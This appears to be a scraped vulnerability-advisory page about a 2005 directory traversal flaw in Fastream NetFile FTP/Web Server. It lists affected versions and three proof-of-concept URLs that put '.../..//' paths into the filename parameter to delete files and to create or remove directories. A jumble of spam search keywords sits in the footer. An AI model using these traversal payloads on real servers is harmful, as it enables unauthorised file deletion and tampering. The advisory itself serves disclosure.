about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability


Title Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
Published 2005-04-26-12:00AM
Updated 2005-04-26-05:28PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery credited to Chew Keong TAN <chewkeong@security.org.sg>.
Vulnerable  Fastream NetFILE FTP/Web Server 7.1
Fastream NetFILE FTP/Web Server 6.7.5
Fastream NetFILE FTP/Web Server 6.7.3
Fastream NetFILE FTP/Web Server 6.7.2 .1085
Fastream NetFILE FTP/Web Server 6.5.1 .981
Fastream NetFILE FTP/Web Server 6.5.1 .980
Not Vulnerable  Fastream NetFILE FTP/Web Server 7.5 Beta 7
Code   No exploit is required.

The following proof of concepts are available:
http://www.example.com/?command=delete&filename=.../..//a/.../yyy.txt
http://www.example.com/?command=mkdir&filename=.../..//a/.../testdir
http://www.example.com/?command=rmdir&filename=.../..//a/.../testdir
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:35:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
m...param. its 2.0 Sex.school Www.Arabsx www.tm241. Www.Porn m /search/ex Www.Sixi.C whkama.com news for \ www.gzwese reminder default OL news for C news for c TELUGU HER Date PHP-Nuke 7 news for c Sexy.clips free+arabi Www.Bbc ur php-nuke 2 Activcard tyrtpyte Www.sandra maxcpm.inf t915t piter nort www.trisha for Invisi mcafee Opan IPB 2.3.4 core 3 jrun tight vnc news for c Thirisha s teenise vbulleting NEHA wwh Simran sex libpam news for c org.wighth irani666 pimp Asia